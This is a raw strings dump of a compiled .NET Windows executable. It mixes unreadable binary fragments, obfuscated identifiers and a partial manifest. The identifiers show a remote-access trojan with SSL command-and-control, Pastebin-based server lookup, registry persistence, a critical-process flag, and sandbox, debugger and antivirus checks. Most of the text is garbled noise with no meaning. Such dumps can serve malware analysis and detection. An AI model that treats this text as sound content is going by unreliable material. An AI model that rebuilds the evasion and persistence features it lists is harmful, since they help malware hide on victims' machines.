!This program cannot be run in DOS mode.
`.rsrc
@.reloc
#33339
&#&Tkl
@h%nA#
#3333#
#33333
Iug3C@
Y\>#7$zW
=5i?@S
-H&\G8
b@1*C(
#3333Sm
&#v"{XR
&#F2tJ^
&#xI=F
#V'L%Z5
#jjo8p
&%}D@
>#qd5U
VVHgR;
enVTS<#
Y+R7gF
#2TT$7
@[& lA
#e|VX{ 8?
~C}(
&#jqGY
&&#<puHY7;
@[& CU,
MrIxS <@2
#lO;Ok
\B9% 6f
i0F8(/
#hh9rr
&#<"RFO
V>#N{*
SyG& !
g}r8&#
-4#:&
]M^?E@
&#[^;7
&#\:|%
C8C=@1
B#1}QK
e$$#@8@
&#ffff
Bl%&F@0
wFC@T
&#f9]A
x(B=B&#
#D1 JV
%oS<`A
#ffff(<
iw8~UiE(/
ABYA#M
3jbm8#
& <5.3
&#(q5'
G?H`C(/
R=F:@:
3$AD#
&&#_",
Y:#ffff
#pY2v[I
# gY~}
#j3yPB0
oW$0*?#`S
U{4 }S=.
L!HG:@.
#3333E3
{UE)b:.
sy)/.
#33333w*
y*rD@>
sy0"9@N
#gFU1&b
C& $ +
t+@;@H
#3333-
@[&#?j
+ER,8@M
&& u;g(
&&#OLH\
F=ED&
=wO >@!
TL4TF#
#Ew{oIL
e5{g;.
&&#xzJs
#ffffbq
#3333]U
v4.0.30319
#Strings
F ` k
C w
!I!q!}!
Action`10
<>9__1_0
<RandomString>b__1_0
<>p__0
Nullable`1
IEnumerable`1
CallSite`1
List`1
__StaticArrayInitTypeSize=32
Microsoft.Win32
ToUInt32
ToInt32
SwapInt32
<>o__2
Func`2
X509Certificate2
WriteUInt64
ToUInt64
GetAsUInt64
SetAsUInt64
ToInt64
SwapInt64
ToUInt16
ToInt16
SwapInt16
HMACSHA256
Sha256
Aes256
aes256
__StaticArrayInitTypeSize=6
get_UTF8
<Module>
MessagePackLib.<PrivateImplementationDetails>
MqFIazCgYbQWJcXPdSIDagIA
MHYhHLOA
YXOBBhiediWQHXhHMVA
XfeJgOYFEhiOkhioCqCVKTmBVxWA
PfGAwMbzPitcBscnLldQDnCaA
pIbVBPOJCadfA
funZOQCSjkPNATkEwChzcnA
VROSNOgwopjlpA
fhuxVbqA
1DB2A1F9902B35F8F880EF1692CE9947A193D5A698D8F568BDA721658ED4C58B
iiBCVBB
xYWXBKWbOB
PEHKHEwTcmHIWB
EOaXPUITAFZgTXB
MsEmYB
zzAgYUnCRLykgjMibWJUdMDdNtfB
bUoAlCqctHBxisFaiB
apQnqIwkRZsbTZwYNwwdTlkzEHqnB
qWwhRUFYlSuFxxOigHJPmAwB
NzCFNWIgAMuPxyHC
CabFCugNxCgHODXttsGlIJYGgCJC
ZPuYebjOhAmpHUdLC
AnoZLoApORPSC
VcwKXiBIxspcIGjsnoNEhQJbjOWC
NtHpfybUjiuyXC
SoZhTzRDyZZC
KJfHmC
JioMOeWIllZSeemC
UlZKOCHLMdEfJJiXFhZKxoC
nseieSVNUxsyLuC
RlFzfRQNpHTgyVfHtouwBD
ES_SYSTEM_REQUIRED
ES_DISPLAY_REQUIRED
MapNameToOID
get_FormatID
DEqVkMmptwnpmeSGiIUQzhjGJD
eOxkZGQZaBDQSD
TjkKyPweTRkHcsfSqagGlAbeKFfWD
ePdcFunXD
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg.HzlaTzoKoVZ9Jb247Vmj3c79IebD
AWLktWtpZTDmD
nQWBYmmD
MBEiQaHTTdoD
FgnpcLeBGBLZoDcTjMekSsD
FMeimaNWmaDxGHseOFRtD
nfzNEzmSZpZsPanQUlxFBkyD
nHhxmINAhUiDkDzUPbaoYYoFnYIAE
FwxFVRFoFE
pVbyOcdQkcoeXGQE
EXECUTION_STATE
WPsQTSWGzOTE
hmtxCtlaHGmgBbPHcDDiYhkBNWE
hxKXEFQXE
NJYPoKPNOOBwbE
CHpIMEKpEToWNyDdHjfCfTldE
wXRLQnVQETCspBIfE
HPDLnDzKlddqcXjE
ULnzmYexsRLAFKpE
LdnZhDcUNzLiAGsE
allYIDTwE
ostABPQJCSdJYijZqLywE
87639126EA77B358F26532367DBA67C5310EF50A8D9888ED070CD40E1F605A8F
foBWxEABbCMifyDF
MAAWblJszTQzFmUwDhKLAZudBGF
ERElYShkQenEzdOcNVtzsKKF
AtJARUF
hXTiFgFbukBPzGdHWUWfUwTzmmAdF
pkzIsWVaHAKodF
OGtwUpHaSagYFBkLlqoACtlPDpF
uVnXOqF
DGJOPHeHMMqftF
skWAZcKBwxeAG
LjtVmmnCjeJBG
yjmhknSdlnJDRGuVgwfJQCiMG
sSwcyjscUPSTlGPEzBxiMNG
upLgnqgzTMeSzqVItlYXpQkPEJTPG
tumUKtjmJPjgaeqOehobcDSG
AjqImVeUG
ysGOXBNVG
lagfWZmYYyVnXCKaBXG
JWQuuSNwKAbJqpLbMduYG
cONYYJcG
IBmKxNiEjhuQIHWcG
fgSUsLJTBCnboNFRnRCPJCySVfG
phhyJbWMZmcDHtCGOiGJSgfG
EyfbMqggWBVeijlfnOHmNSQjxlG
IYgJafANeCzniLpG
MToubiAVRpCZsVzlzmHLJJNLqG
qdZUALApIasIdCimalxG
WbjBgcewzaqCmEbBzYshsjEBH
GhgpxgLiCMjgzfwmESLxLPEH
qFBzOcqbZBVfhpJhsGpzSTKH
saoyPH
VgOlLTH
dEdhIPGECDbHlWgzZVH
YLpcGlMHWxSePwtlxIcXXH
apTHQfaH
kGOpUtZMkWoMfVPuHQwuwsjnJOZfH
cRADcuFOQAjFxfciBbBCNPIFtGgH
tqGFPAOnhoKFhOyXpXbkfnH
xFmmXbyH
TDpktBiOEdygbRpzH
OkitBVWIBI
MgmIQaiYbTJHIVZTDI
get_ASCII
mnUjKglCmmeoJI
goldHOIHDzHUQzTizlQI
BqYZdWsjOUYCxYpxAICPIQLHHdRI
eueYiCixlkbTI
GkzMjeCEqzCtdccI
VbONzRlI
KgawnQlgmI
uQSWKPmsSnmPjWfcjpI
ZICRhZXlpxjyI
jDLDwYcmkeCJ
JtTXtdRWmwWomYYfzdVKLmuHiEJ
AVGKDxoJJ
CKnpPbyegOsLNnpCdDGZMbVbsiNJ
iidkgZQeOhmAgJdKhoNLmSJ
OcnIOjXMtUIXsmuzdwUGVgAiWkXbJ
VWaowHHUWdJ
KGKEyDRsYRHefJ
VliVhJ
lbhSmnxXdxlfFTWHPoIaEnJ
AyqUPqJ
OKttmjmtgluCEoGK
WWqQqCkThIK
ttAhSjGylAYQK
sJnWMuRLtsiVEUMMdKXpkxUK
yiyHjGTRyxzJhhwRZBoUMlkFVK
UhHltzdK
JaYqlmDeK
mnueQSlEiGdiXLLZNROeyWhljK
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg.W4kEboCDkGbSFBgbZGzR1ifut6nK
tLNcsHLVdwiyyexxISSGnK
blCFSiOahbtPbBoAHnK
UcIFjzlLwolBDDSKL
ahQJpQwAageLL
kTTLCLpJQguZeyfnUUxpkL
YhIYtJhuNJdzlL
EVgmYEoL
pSMKfpDcKHWLWUaNwL
qcXngpwwFqSyL
BpomSifoxSLUhAM
uxifwZAWiCcGsaVAbWCPHMIlVHM
xgfeEtEpIM
pXTVsUWM
TnSKqYKSuNdOIhTVaLohYDWZM
cPzVPEObWXUFXauglbM
TLUcwzHdM
oFEuCpFcbFKiBnqpujPmWNksdM
NFiTqqxoUuiM
gKzkEKRuDeQsnVBkdKqnFnEuM
NnARjZwM
dPYkxhMNbiZlfYyicdhZbnFuXzM
ZPgdJPlzjKLnWJaIOloAmPREFBSDN
mnnqtKmxIVWnSLuLUUtUN
xVAcWFXYuyWPnoHXN
NPHxtWtLDxWKHVqYN
JbmkJEbNBjEpaEZN
eFxkmQXicgKAWPuaUQQcuZuiN
AOaFOREGkDYBokOHTNHGO
qXoZxMoHNhZbFBjmTRYmiFxGO
LimhbRKouepUslzSaUsyIRUihdHO
YZjqHO
System.IO
DdJyzcmwbAJqWCOFpqATDBNyDhJO
DkJcATPO
wzUptwaO
JDqadHlaFpRskO
lhhmeKbiXQuytO
lAFkdxMCiQCcGglPWjYuO
wxloPSyO
VTuxYJEEIZKTAykmDAP
VAYeIP
AcUtPihoHLTablWCEmIWmjVwflJP
awHFLP
xqCZJkBFqqyhLaQtOP
yCxPZP
FNWTjzhUXodPtUUFBldP
BUfaVLmstPqLWzlP
ICceLbenkzfnP
quiPpkPXXTibZccHUkOdAAsLmLbqP
PykqAQMxbegFkzP
FaBuPopHQ
ZKBCmqanuhehbOIQ
dZmOSVPehiUWBsAXWEENqFPIQ
wxpDbSIHpkFsipmMWctZfRwuepKQ
ASIfUMQ
ykBKOQOuVSQ
KeLPWGHBQteQ
pNkLkaCaAJoETWCMOglaCJdHgQ
ZUHQHRcExFdAFbcRsQ
JpHEIPgZmEawlaFiqInDyyQ
uiqxTVhpTuhxPBR
fwcXfdgKqlWPaIpTNmnBZDR
RJimCmQgjeQwoIoHR
FBsSKR
KzqpIgKKhRnoRaGyWR
tWpDwOmYEHEOVzJuVOTNikcR
NIHFfR
hBgaItZBzdTFsbkguiNNqjR
SEHcGwJazQHBYWtkR
SdZDHGNwyAeJjgACFJYoR
xsdlKajHIXccDTxR
CkxNPbsxR
wiaWZOifXoyDOS
AJsHlbLEtkAKDqUqouMJNmnnWSS
ES_CONTINUOUS
mDiuUunXHHbS
GcXzxhdtDAFXXnckHbS
WHnRLjS
CGAKnLUGpnylGxpoS
JVqONPBAjJzmYhPucnlKcUkAuAT
hZjOaLycUJnDT
RfLUcMET
RLhJXEpANyxaLT
OqDQKIHAfQOFMPGdUPLSMMeNT
zqLiEItltecGfKnqqtpAyTFQT
oEisTuInpEinQuJfuItPnXT
MipafWTTnT
lcVcwDVdzfCoHQmpT
hZxXDzkuazJKsjeMKzNuHhxT
uhxwLssSRQYLZnKREU
RQTjjOelFU
PKOxjJglyzGNU
UteZLULsdMTU
gWcOPVxgxTU
hPkGOaUwyxSnbfwunwZU
CyEyTkeiLokdU
aOUlbeFTBIXGSpTsVToU
tQipAuSCXHnxtkaTaaeAsU
UBHOCYhCJZMxePSBbWBokqUpUCNsU
aODTnHQchpSzU
cGfPeHOWyNiEzjpkqopByUAV
jqKuJgAYCXgRcqjQIzixPBTyPyjAV
UGwdtTdcoGkAqcuhWJZKBnHV
get_IV
set_IV
GenerateIV
nBwwsxoopuFijWtlPDyemhSEyIKV
KpjRCgQBlAxsGgfuPDRV
osjbaxbTlOyWV
eptkXV
ExyFzbwKGsWWODuYPqCHYV
AgWwOTeQQTJwfbJDZV
uTLXBwbwaV
KThwaMhpCKGbV
SfSlqV
YmbofjGlysV
DCyGSuCW
gBdgkAWLUEXGW
dwODwNkUKzQW
weuFhyWW
DZWnxotXdW
aAuUsEIUdFOfQcDEXlhW
KQhRlkopUoTRAZgAlW
juzSuOdVLGtsMVAOFeDKQTSZztW
ClJMxwHbbwW
oNNIAsMGTswHtlnNxPjzW
OcecshzQjDcliuDgUBbPeWIsJEHEX
KzDzBZEOX
paXHxVmEmPogKEcIQX
lnxbBMVaQQGAZOKpnSxqZCTX
dREJkBJTfhfDxdCBxihWMKiX
lASZFtnYHduzllUclX
FyPnBMyX
qlcPUdcMbUowKScJteKY
YLkyQnpxnGAUWflNY
YqxJmSSIhTY
JoqQLWOBqcDGQiahTY
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg.tJX7dJC73hWunDpTZpiWOvrvasVY
RzKQiZemXcHsNsJdTNnJYDbY
lqJYUJEmXjTnigcY
VRMQyldlWNCuwRIATnRhY
nuIyWwQWjhyaOVToKCthY
pzRTApY
ySxeqQZqWYGsFsDWcfdiwNzqCZ
PuoPxpgFOUJkUyCZ
wFqKulAHpXJOLKUZsgKYlLhqSnFZ
ufTNzwYyPjdtiOHZ
COGGMZ
EOGHFudEOZ
HGcfkwXRKFbcGRZ
pogkJbiJVRhSZ
DLsTLpXZ
FjACaFBjGeZ
cQSutzeNamTIOEmwBkYfZ
BftUawCHQzZ
value__
xsVnUIKdsKJSCOiWxCDfQa
DNgMgCVmAba
cSQAnAEOPyda
ReadServertData
HwebXjqUjta
NxKKhVnzlyoUfKSuuVLAOjfnZymta
NIiIaVACza
MiSIIbtqSgtlRJgwRyEyZDb
eIaDnJKnDb
ZCTERqmYREb
muXaHsYcxtgXMAXKaJGDFb
iRJlhyIb
CkKGAYKzkgMGMmTdXUPKb
ZROVsoIkaLjmQNb
jayiPwXgbVRRtZgpImBgRROb
PiTUYQNyRVWmnJESJRNdJbBncb
ehTXBpNhLdb
mscorlib
yjbRmbioFyxPjBCilRzYGofYSYjb
BjEmTGZnuIQYaQQMGFbzb
MLGhwhCc
DFOhBRc
tKSCWuWc
SKKdNZIIqMoekUGaMzxUNZZc
DjtFQSWAFGtDfVxUsCPhIdc
ePqWdgZCHCYpoyZAAHhiDbgc
wVkGwhlYqKbBunDlEpRicpchc
System.Collections.Generic
Microsoft.VisualBasic
get_SendSync
TlVVFGfceWgmFJXzVFoc
CaDmxHlAyxgpc
fiOCjmKthIqc
gssTsepkmacZWXlJDd
uuuuSFSthTsZnwTwoWEqJd
acNTjesBYQhXuTNd
EndRead
BeginRead
Thread
InnerAdd
SHA256Managed
get_Connected
get_IsConnected
set_IsConnected
Received
kNLeKEkKOwVdxgfd
get_Guid
MZjRHRwHLBkVUHuJVqSGNuajd
<SendSync>k__BackingField
<IsConnected>k__BackingField
<KeepAlive>k__BackingField
<HeaderSize>k__BackingField
<Ping>k__BackingField
<ActivatePong>k__BackingField
<Interval>k__BackingField
<Buffer>k__BackingField
<Offset>k__BackingField
<SslClient>k__BackingField
<TcpClient>k__BackingField
InnerAddMapChild
InnerAddArrayChild
EgkZxowywFQiamAcZbuitplNmd
Append
RegistryValueKind
PQBbjjVSjdmayzkbagqd
xnfbAGe
hEDniDMGe
UfEeMGmCxywSCIQnPYFnVdALe
HnYpgAizxyUMaMlWhNe
RIwYnnGPZDmlEWQzkbQtjBHugwERe
PajfJMjLKSbe
Replace
CreateInstance
set_Mode
FileMode
PaddingMode
EnterDebugMode
CryptoStreamMode
CompressionMode
CipherMode
SelectMode
utf8Encode
DeleteSubKeyTree
get_Message
DetectSandboxie
Invoke
IEnumerable
IDisposable
ToDouble
SwapDouble
get_Handle
RuntimeFieldHandle
GetModuleHandle
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
WriteSingle
ToSingle
SetAsSingle
InstallFile
DecodeFromFile
SaveBytesToFile
IsInRole
WindowsBuiltInRole
Console
GetActiveWindowTitle
get_MainModule
ProcessModule
set_WindowStyle
ProcessWindowStyle
get_Name
get_FileName
set_FileName
GetTempFileName
GetFileName
fileName
lpModuleName
get_MachineName
get_OSFullName
get_FullName
IsValidDomainName
get_UserName
lowerName
SetName
CheckHostName
DateTime
get_LastWriteTime
ToUniversalTime
ReadLine
WriteLine
Combine
OxCcuCloe
ZlPCJUGWpe
UriHostNameType
get_ValueType
valueType
MsgPackType
ProtocolType
GetType
SocketType
FileShare
System.Core
Serversignature
Dispose
StrReverse
X509Certificate
ValidateServerCertificate
certificate
Truncate
Create
SetThreadExecutionState
Delete
CallSite
CompilerGeneratedAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
DefaultMemberAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
set_UseShellExecute
ReadByte
WriteByte
DeleteValue
innerValue
get_HasValue
GetValue
SetValue
get_KeepAlive
set_KeepAlive
Remove
zVDycWBRgcFEURMXwKcLcwe
$VIP.exe
set_BlockSize
get_TotalSize
get_HeaderSize
set_HeaderSize
set_SendBufferSize
set_ReceiveBufferSize
set_KeySize
dXZhWIKqfgCpTAf
SjPeWSmVIOWAf
aSefuZfDRxnfiWuTaTRCf
ITghmkQgNlQbNtLShiCf
YHoOzhUeWpsFUADTSXTzyXYLspKf
mMykEGHgtLf
cpfCVCfZkbNlwyLeSUDzTLxUnOwMf
SVZaSygwKxOf
IndexOf
iOZhaSqRBlIYZjISPf
fNSXfnfRf
JnYPhJTf
MCtddsLgSoyGmUf
zfZZbffzXcURxAkTsniqwYCqgCdf
XUluNNtfgzWlgqqsHRyUaff
kqCFuDWebwIgKQAXggqznZFWnf
NqnfSWPYIHZYNBWmbTdaGhQxf
slMBfgalAg
wiKgbfGZNhbnwtTXnSRRYmFJhVg
sciEAmOdBlJcTIAkLaNyXbJBmQXg
strFlag
IZGNQmsETnVBxLfg
KDWeWBdEGFgwsWCWsZKBKlVGwNcfg
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg
CryptoConfig
PMyNjQOEVsPmpYdfHtUgoEpfmjmg
get_Ping
set_Ping
System.Threading
set_Padding
add_SessionEnding
SystemEvents_SessionEnding
MidpointRounding
UTF8Encoding
System.Drawing.Imaging
Ceiling
System.Runtime.Versioning
FromBase64String
ToBase64String
ReadString
DownloadString
WriteString
RandomString
ToString
get_AsString
set_AsString
BytesAsString
GetAsString
SetAsString
GetString
BytesAsHexString
Substring
System.Drawing
get_ActivatePong
set_ActivatePong
LFoCCAaAiTEsKBfOoQog
set_ErrorDialog
nXcoyNjJh
xPbxgDiBltltyEMiYPh
EVkUmkiPjxRh
qcWSAgOhxLdiPVTlPcmYnCSh
VHsWGnRiuCoaabKUGRgSJspBTh
fTVkiApyefyeNaFTh
ZbCbsdwRUh
iFeEhcwFoZUCOQZzSjgWPYh
ComputeHash
strToHash
GetHash
VerifyHash
iWtNfysh
oFVYRSTHWwIfDjbYjhzJsOth
get_ExecutablePath
GetTempPath
rsmath
HmacSha256Length
get_Length
IvLength
AuthKeyLength
length
jMIywDKhxpftXLWpuRxLwzuuh
sKTwqQLwh
CCykPWOwlipEBmeOOLfYCKqQfAi
yuKZkVGxJaNpZZsCyBGxGyOBHi
VDcpQGbCVyoWwuTiKOuOzOkIi
etVAJhoLEghphGPpnVueMi
jKfPOWGLkJsRi
wLRefPBkQgPPChSi
jhVkTVNOAWUi
WKoxTXi
WgUhVsAtnCUzYi
TUbFBai
CKyImzPjUUSKiai
sMQyXOSgflaatOVLRkubi
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg.OSPGHMtRNWIF1argOMAO5iIxLIri
CHXYHTewYldkQuDcPjeCYdJBdFui
PGuRyWqUkfcHygui
IsbdOTpJKj
OhnpDUoqIqXTOIJQtdOMj
TafVZdhMXkbcuPptcRfWMj
ESKnZBkDsBzACiRj
lhmXoYFJpgywXKGjzkncmzcjGAXj
JUwIJmwbwXZBqHeadsZDXj
MydfXj
msgpackObj
listObj
RYjaCNMgxBUayNoMJkCTeGDKtej
thThGNDAYQLnAzHYYLWQMdjj
RXBMYWayCLGmXdWPpkmj
LZJykhWByuzpj
PPVVWgkkiBNsWHsbZlofmeouj
LRCelyaMwySaxwj
xGqUoPmQqVlMayeBk
JzLDcHsMk
CSpTfhIBjMBERk
kkFoUhdOSZElIpkRsLPXRk
idtmMfciUk
MessagePackLib.MessagePack
MsgPack
AsyncCallback
RemoteCertificateValidationCallback
TimerCallback
unpack_msgpack
RegistryKeyPermissionCheck
FlushFinalBlock
ofFLLcPkRpyeQKlwyfk
HnGKLyCKeSNWMQxDZpBDqk
bXwgtIxkaByBAVzkxbcWGyGTbsk
IsSmallDisk
pPpoiKQNPVtSzqoApnpyKFASSwk
ULbWiyuFl
YCYsMgUMpwqCFPKpMgZkcfZRl
strVal
RtlSetProcessIsCritical
NetworkCredential
System.Security.Principal
WindowsPrincipal
AreEqual
get_Interval
set_Interval
AyFhcl
jTgGtcl
XLRJwogZAVaVKhfjRDhl
Install
kernel32.dll
user32.dll
ntdll.dll
WriteNull
SetAsNull
MutexControl
OgVnTuOkqDpVpBNfsFpHEtl
RWYSFdTPQaQPWJDkfLuotMwl
jNbQdXnXiyxwl
ACkxyAWDm
OuRxtpBSwVWaEUOwmoCsnQGDYSm
YWjoquzsZhzDBcxwOUYIgeSm
BKSkTm
Encode2Stream
FileStream
NetworkStream
SslStream
DecodeFromStream
CryptoStream
GZipStream
MemoryStream
dproblem
trilangeproblem
get_Item
get_Is64BitOperatingSystem
ZMHxomMxTFpncgm
SymmetricAlgorithm
AsymmetricAlgorithm
HashAlgorithm
PyZbeuddbRtofaTJiOddTJxkm
Random
_random
sgetrandom
rafndom
rarfndom
fMutMRqm
ICryptoTransform
bmjeZzjHmVtm
MsgPackEnum
lyuOTCaWxAYHEBVjkEWwxym
PDRMLONCwFpuFQgJNHBtdnTtIn
efwtMVVwhBfFxZHmyGEySkOn
XMERXqctOxpkAJQMScgXn
WriteBoolean
ToBoolean
SetAsBoolean
QiCVgToan
HwidGen
children
iXanfzqxFcAEfn
X509Chain
AppDomain
get_CurrentDomain
Pastebin
IsAdmin
xAghljjTxJoggPHiXOxcMoln
ElXolJguVYDUWTNFZRiWMJnn
GetFileNameWithoutExtension
get_OSVersion
System.IO.Compression
Application
System.Security.Authentication
System.Reflection
X509CertificateCollection
ManagementObjectCollection
set_Position
position
CryptographicException
ArgumentNullException
ArgumentException
jFUzUApxUtn
Unknown
TOLJJWLYZmSxn
eAVkVKzn
OYIKPZtJtVsqFdRCo
VSpDfjFo
sOPYntIAoQXlZAjuhhXkNGkFJo
WMcEIyqTQPoPFTckMRROo
xFMuoXo
qFMfnHanEdQCOtPyqXzRkoYo
WEAbwZQeWlfZXhLpAqgJMyZo
MVKdKBVNFPFYQTfo
ImageCodecInfo
SendInfo
FileInfo
DriveInfo
FileSystemInfo
ComputerInfo
CSharpArgumentInfo
ProcessStartInfo
ConsoleKeyInfo
QdKojdQmXYiLqfo
xgetalaho
mjgFmZPsZzGuiwwVSmmiio
hDglKByXiwilPsAgJzGjapXBojo
fhello
JNdjhyoo
FbiiVTtltSNHHeStKzo
bxwnINSdFIGaebDKSnimlyHp
SMGVRp
IYhfVieiFEdoWgDGfOsTp
pAiJap
WriteMap
MomAEXnbp
PreventSleep
etRFRSNqHQKdXCAPwzGaHliQCqfp
JdNLOFbcMXdsVblhyZVVdlp
JkysuZOEqxLHdgjnp
currentApp
mXKhbyCKtVNguDdPYTzEQRWqwqp
Microsoft.CSharp
XMMGoExbTxshbTplMmDq
WoeyBIq
wWYAVZQwIzeNZjEiWjQssNVIq
ogOzHTHoGIsmIq
TcLWWqnQExCGyOq
xhTbyzAYq
ELQjGdabuhfHGHoQPMwZKdq
pHXSZRCSCnPVjOCehZdq
flOQkWyCJeCFfcdTuQFBoaYeq
azRJIwhzNaSUCWAhsmiEjEmq
System.Linq
JIQbuMCYwhPgSbLecpq
PEODLkVYMtpq
lyXuMhxq
SBuuQoUxQxpKWLpJmUqxq
IdYuvar
InvokeMember
GetRandomNumber
MD5CryptoServiceProvider
RSACryptoServiceProvider
AesCryptoServiceProvider
StringBuilder
InstallFolder
IdSender
sender
Microsoft.CSharp.RuntimeBinder
CallSiteBinder
IEEERemainder
GetEncoder
get_Buffer
set_Buffer
WriteInteger
get_AsInteger
set_AsInteger
GetAsInteger
SetAsInteger
DetectDebugger
ManagementObjectSearcher
SessionEndingEventHandler
IdBanner
ToUpper
DetectManufacturer
CurrentUser
StreamWriter
TextWriter
BitConverter
ToLower
IEnumerator
ManagementObjectEnumerator
System.Collections.IEnumerable.GetEnumerator
Activator
.cctor
Monitor
CreateDecryptor
CreateEncryptor
IntPtr
EiaiuDRMUMAguWnCs
FECjHs
yNfFDFbnyFcYNmLs
RKgdiYNEGkBtcRUpsVPMs
OwlkjqWKJncRhDQlmgKgIIgFQs
lFTIVfoaZkIDhNMYBRs
LJPkDDYNCxQIobbewoIYs
pzAOKtepUHUsqRXGHzDhSdQcPEbs
QtVMcs
System.Diagnostics
ChWKds
NativeMethods
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
System.Runtime.CompilerServices
DebuggingModes
ExpandEnvironmentVariables
GetProcesses
GetHostAddresses
System.Security.Cryptography.X509Certificates
Encode2Bytes
GetUtf8Bytes
utf8Bytes
Rfc2898DeriveBytes
ReadAllBytes
DecodeFromBytes
SwapBytes
LoadFileAsBytes
GetAsBytes
SetAsBytes
GetBytes
rawBytes
CIICVpOUQgs
CSharpArgumentInfoFlags
CSharpBinderFlags
esFlags
Strings
InitializeSettings
SessionEndingEventArgs
CasiYSFQkDSXsbNfRuQPwLjBAhs
RunAntiAnalysis
UCCuuaNhofamsxsdBjs
ICredentials
set_Credentials
Equals
zoMKdqXUoybIBMLgKVHaMasTWZnls
SslProtocols
ReadTools
WriteTools
BytesTools
System.Windows.Forms
Contains
System.Collections
StringSplitOptions
get_Chars
GetImageDecoders
RuntimeHelpers
SslPolicyErrors
sslPolicyErrors
FileAccess
hProcess
GetCurrentProcess
IPAddress
Compress
Decompress
System.Net.Sockets
set_Arguments
SystemEvents
Exists
Antivirus
AsdAqweFghZxcvBnmFGhRTyrErIeitegfletdfEfdsfdshg.
DORdckYiVKAFRCbJeEIYEIblNzBt
qYRoLAnWKUIAPXYPMt
HlntktNEHmZCMonbJiSTjsuRt
Concat
Repeat
ImageFormat
format
WriteFloat
get_AsFloat
set_AsFloat
GetAsFloat
SetAsFloat
FindObject
ManagementBaseObject
ForcePathObject
Select
Collect
Connect
Reconnect
System.Net
Target
KeepAlivePacket
Socket
System.Collections.IEnumerator.Reset
get_Offset
set_Offset
pOlIRFpKpNfHegt
ClientOnExit
zBnkGwZGGPMLkdFyAScTJkt
yfNVtUpFqnbGoGFcyHUpxutoOlt
GetValueOrDefault
IAsyncResult
DialogResult
ToUpperInvariant
WebClient
InitializeClient
get_SslClient
set_SslClient
get_TcpClient
set_TcpClient
AuthenticateAsClient
System.Management
Environment
parent
System.Collections.IEnumerator.Current
System.Collections.IEnumerator.get_Current
GetCurrent
CheckRemoteDebuggerPresent
isDebuggerPresent
get_RemoteEndPoint
get_Count
get_ProcessorCount
GetPathRoot
Decrypt
Encrypt
KKdhUsOMezFiOTAgUhmgbSpeLBFqt
ParameterizedThreadStart
Convert
FailFast
ToList
xgettt
System.Collections.IEnumerator.MoveNext
System.Text
GetWindowText
ZeOUbyt
iHulKKzkuDu
FdtKeGRCKu
LsinhRlPgusTbXYQPTJpKu
SsUDQXIIKdiXOu
YzNdaCAxDcZHzkqBZu
CcqYKFIEAlaBeu
OVRCPJJFeu
tIhRhu
QwfDQRiu
KAKgjAsAPJpwlku
cTJIPgsfSADYLqbzbzAylu
JRRIPJzAHcNljOmdPiMTQVtu
ZWdDhwu
VuuHZUnqJgKgXgiwFsZZotYAw
BBjhyDQtBzSfpHgsyJFw
WZcomSRDBttYJjtXw
RYblaJJlsyadVdTqYw
HUuqMMHzVjDnQbw
HQbhTAabkdtbSnuGthTYCLMNBdw
RfkXKBUPBVpEOjIYfkGqiHJiw
MkRORimHiqhXcRMSQuJRjw
zHxciyxlkKMkpKeSfEWqPKUenkw
GetForegroundWindow
set_CreateNoWindow
iMdmSZsEcXWzpBABUzKVDuw
jBwUSEcmlcztVNaJQcEkpCMxw
hEhLzFObayBx
BAqRjxUMCCcuFx
ZPXpCsYnQqbgqZnfpAlLSotHx
nkQwREUWxYtPx
wgypXsPuGYVcUx
idzqJHdmOHCyFGPGRVx
CloseMutex
CreateMutex
gPhbgx
MessageBox
qeQjfAjdIeOowdmCyqx
siZajHZOENFfOy
layRRqCJexGmmohhllsKoPTBkLQy
fxziyDPgTbVztOnDXInNiIOSy
RwNpSnmUjnBcVPIApuxUy
nZCQowVy
lgWzkpmuSyuHNlThZy
WirteArray
InitializeArray
MsgPackArray
ToArray
get_AsArray
refAsArray
VsYoby
qGaaEiaBAkBEkchNhBbLEAYXBey
get_Key
set_Key
CreateSubKey
DeleteSubKey
OpenSubKey
get_PublicKey
ReadKey
_authKey
masterKey
RegistryKey
sfJdjgsxkBSCghfTQQTDVOSqmXfy
System.Security.Cryptography
ReuRYHiHnlnYnTEzpxYoiy
Assembly
AddressFamily
BlockCopy
WriteBinary
ToBinary
get_SystemDirectory
SetRegistry
op_Equality
op_Inequality
System.Net.Security
WindowsIdentity
IsNullOrEmpty
loWIFGoKdnACXdWYTQMoAsORBwy
HjRVQPAHPDelwy
AgqywHkLyBzy
UdnKzdWDsSjXlwFLVQlHMDz
GcjlULz
fhEgBzxNSZozcNz
xKpPQIucgTApzJDwLbkIZcGnBJqOz
WQwESz
jgFPLOCtybCdSz
hujysgSloWpsTz
afULeNKahInWz
xROStYbyLhjMaodBkXz
UMZWiMUzCfpJUCuFPpSCpdz
fQotCbVePnlRHuGJcTljMxPAsunz
qZfFEsxKUMzFALomzEWEAKqz
WrapNonExceptionThrows
1.0.0.0
).NETFramework,Version=v4.0,Profile=Client
FrameworkDisplayName .NET Framework 4 Client Profile
_CorExeMain
mscoree.dll
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges>
<requestedExecutionLevel level="asInvoker" uiAccess="false" />
</requestedPrivileges>
</security>
</trustInfo>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<application>
<!-- Windows Vista -->
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<!-- Windows 7 -->
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
<!-- Windows 8 -->
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"/>
<!-- Windows 8.1 -->
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"/>
<!-- Windows 10 -->
